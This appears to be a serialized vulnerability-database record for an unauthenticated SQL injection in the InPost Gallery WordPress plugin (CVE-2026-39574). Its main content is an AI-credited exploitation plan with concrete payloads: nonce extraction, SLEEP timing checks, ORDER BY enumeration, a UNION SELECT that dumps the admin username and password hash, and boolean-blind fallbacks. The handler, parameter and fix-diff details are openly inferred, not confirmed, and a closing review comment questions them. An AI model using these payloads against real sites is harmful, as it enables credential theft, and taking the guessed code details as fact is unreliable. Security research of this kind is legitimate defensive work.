[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2ge8xFhMrXilxPBZpS1pVWFctu_NFxVMQ25VzszMF-Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39574","inpost-gallery-unauthenticated-sql-injection","InPost Gallery \u003C= 2.1.4.6 - Unauthenticated SQL Injection","The InPost Gallery plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","inpost-gallery",null,"\u003C=2.1.4.6","2.1.5","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-20 00:00:00","2026-04-30 15:03:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6a50f6ba-1fc7-4cfb-b419-69ad7e9dacf9?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39574 (InPost Gallery SQL Injection)\n\n## 1. Vulnerability Summary\nThe **InPost Gallery** plugin for WordPress (versions \u003C= 2.1.4.6) is vulnerable to unauthenticated SQL injection. The advisory does not name the affected handler; the flaw is assumed to lie in the handling of AJAX requests that retrieve gallery or album data. Specifically, a user-supplied parameter (likely `album_id` or `id`) is concatenated into a `$wpdb->get_results()` or similar query without going through `$wpdb->prepare()` or being cast to an integer. This allows an attacker to alter the SQL query and extract sensitive data from the WordPress database, such as administrator password hashes.\n\n## 2. Attack Vector Analysis (Inferred)\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Hook):** `wp_ajax_nopriv_inpost_gallery_get_album` and `wp_ajax_inpost_gallery_get_album` (assumed names; confirm against the plugin source)\n*   **Vulnerable Parameter:** `album_id` (sent via POST)\n*   **Authentication:** Unauthenticated (PR:N)\n*   **Preconditions:** The plugin must be active. A valid nonce may be required depending on the specific code path, though WordPress plugins commonly pass such nonces to the frontend via `wp_localize_script`, so one can usually be read from a public page.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The request hits `admin-ajax.php` with `action=inpost_gallery_get_album`.\n2.  
**Hook Trigger:** WordPress triggers the callback associated with `wp_ajax_nopriv_inpost_gallery_get_album`.\n3.  **Callback Function:** The function (likely named `inpost_gallery_get_album_callback` or residing within a main plugin class) is executed.\n4.  **Input Retrieval:** The code retrieves the `album_id` from `$_POST['album_id']`.\n5.  **Vulnerable Sink:** The code performs a database lookup:\n    ```php\n    \u002F\u002F Inferred Vulnerable Pattern\n    $album_id = $_POST['album_id']; \n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);\n    ```\n6.  **Response:** The results are typically encoded as JSON and returned to the user.\n\n## 4. Nonce Acquisition Strategy\nThe InPost Gallery plugin is assumed to localize its AJAX settings, including nonces, for use in the frontend gallery views; the variable and key names below are inferred.\n\n1.  **Identify Shortcode:** The plugin is expected to render galleries through a shortcode such as `[inpost_gallery]` or `[inpost_album]`; check the plugin's shortcode registration for the exact tag.\n2.  **Test Data Setup:** Create a public post containing a gallery shortcode to ensure the scripts and nonces are loaded.\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Gallery Test\" --post_content='[inpost_gallery id=\"1\"]'`\n3.  **Extraction:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to extract the nonce from the localized JavaScript object.\n    *   **JS Variable:** `window.inpost_gallery_ajax_obj` (inferred).\n    *   **Nonce Key:** `nonce`.\n    *   **Command:** `browser_eval(\"window.inpost_gallery_ajax_obj?.nonce\")`\n\n*Note: If the `album_id` parameter reaches the query before the nonce check, or if the nonce check is missing entirely, this step may be skipped.*\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection or a UNION-based approach if the output is reflected. 
Since this is a \"get_album\" action, results are likely reflected in the JSON response, making UNION-based extraction more efficient.\n\n### Step 1: Verify SQL Injection (Time-Based)\nSend a POST request to `admin-ajax.php` with a sleep payload to confirm the vulnerability. Repeat with a different delay (for example 10 seconds) and compare response times so that network latency is not mistaken for a successful injection.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `inpost_gallery_get_album`\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `album_id`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n### Step 2: Determine Column Count (for UNION)\nIterate through `ORDER BY` clauses to find the number of columns in the original query.\n*   `album_id`: `1 ORDER BY 1-- -`\n*   `album_id`: `1 ORDER BY 2-- -` (and so on until the query errors; the largest value that still succeeds is the column count)\n\n### Step 3: Extract Admin Data (UNION-Based)\nOnce the column count is known (assume $N$ columns), extract the admin user details.\n*   **Payload:** `1 UNION SELECT 1,2,user_login,user_pass,5,6...N FROM wp_users WHERE ID=1-- -`\n*   `wp_` is the default table prefix; substitute the site's actual prefix if it has been changed. Using an id that matches no album (e.g. `-1 UNION SELECT ...`) keeps the genuine row out of the result so the injected row is the first one returned.\n\n## 6. Test Data Setup\nTo ensure the vulnerable code path is reachable:\n1.  **Install Plugin:** Ensure `inpost-gallery` version 2.1.4.6 is installed.\n2.  **Create Album:** The plugin may require at least one gallery\u002Falbum to exist in its custom table to process the query.\n    *   `wp inpost-gallery create-album --title=\"Test Album\"` (only if the plugin registers such a WP-CLI command, which is not documented; otherwise use the admin UI).\n3.  **Create Trigger Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Target\" --post_content='[inpost_gallery id=\"1\"]'`\n\n## 7. Expected Results\n*   **Time-Based:** The HTTP response should be delayed by approximately 5 seconds.\n*   **UNION-Based:** The JSON response from the AJAX call will contain the database string (e.g., the admin username or password hash) inside one of the fields (e.g., `album_title` or `description`).\n\n## 8. 
Verification Steps\nAfter the HTTP exploit, verify the extracted data against the database using `wp-cli`:\n1.  Check that the extracted hash matches the database (substitute the site's table prefix if it is not `wp_`):\n    *   `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n2.  Confirm the vulnerability by checking the plugin's code for the lack of `prepare()` in the `inpost_gallery_get_album` function.\n\n## 9. Alternative Approaches\nIf `inpost_gallery_get_album` is not the vulnerable action, check:\n*   `inpost_gallery_save_sort`\n*   `inpost_gallery_get_gallery`\n*   Any AJAX handler registered in `includes\u002Finpost-gallery-shortcode.php` or `admin\u002Finpost-gallery-admin.php`.\n\nIf the response is not reflected, fall back to **Boolean-based Blind SQLi**:\n*   `album_id`: `1 AND (SELECT SUBSTR(user_pass,1,1) FROM wp_users WHERE ID=1)='$'`\n*   Compare response lengths or success\u002Ffailure flags in the JSON.\n*   MySQL's default collations compare case-insensitively, so wrap the literal in `BINARY` (`... = BINARY '$'`) when the extracted value mixes upper- and lower-case characters, as password hashes do.","The InPost Gallery plugin for WordPress is vulnerable to unauthenticated SQL injection via the album_id parameter (parameter and handler names are inferred, not confirmed against the plugin source). This occurs because the plugin directly concatenates user input into SQL queries within its AJAX handlers without using wpdb::prepare() or type casting.","\u002F\u002F Inferred from AJAX handler inpost_gallery_get_album\n$album_id = $_POST['album_id']; \n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);","--- a\u002Fincludes\u002Finpost-gallery-shortcode.php\n+++ b\u002Fincludes\u002Finpost-gallery-shortcode.php\n@@ -10,1 +10,1 @@\n-$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);\n+$results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = %d\", $album_id));","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the action 'inpost_gallery_get_album'. An attacker sends a POST request with the 'album_id' parameter containing a SQL injection payload (e.g., '1 UNION SELECT...'). 
Because the handler is assumed to be registered on the 'wp_ajax_nopriv' hook (the action name is inferred, not confirmed against the plugin source), the vulnerability is reachable without authentication, consistent with the PR:N component of the CVSS vector. If a nonce is required, it can typically be extracted from the JavaScript the plugin localizes on public pages containing gallery shortcodes.","gemini-3-flash-preview","2026-05-04 19:32:24","2026-05-04 19:32:44",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finpost-gallery\u002Ftags"]
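Review bot: the single hunk in research_fix_diff has the right shape, since `%d` in `$wpdb->prepare()` casts `$album_id` to an integer before it reaches the query, but its provenance should be stated next to it: the removed line is identical to the snippet the page itself labels "Inferred from AJAX handler", and neither the path `includes/inpost-gallery-shortcode.php` nor the header `@@ -10,1 +10,1 @@` is taken from the 2.1.5 release, so confirm both against the tag diff at the plugins.trac.wordpress.org link in source_links before citing this as the actual fix. Two follow-ups once the real code is in hand: if the id column turns out not to be an integer, `%d` silently turns a non-numeric value into 0 and `%s` is the correct placeholder; and the read of `$_POST['album_id']` shown in research_vulnerable_code has no `isset()` guard, so a request without the parameter raises a PHP warning, which `$album_id = isset($_POST['album_id']) ? absint($_POST['album_id']) : 0;` would avoid.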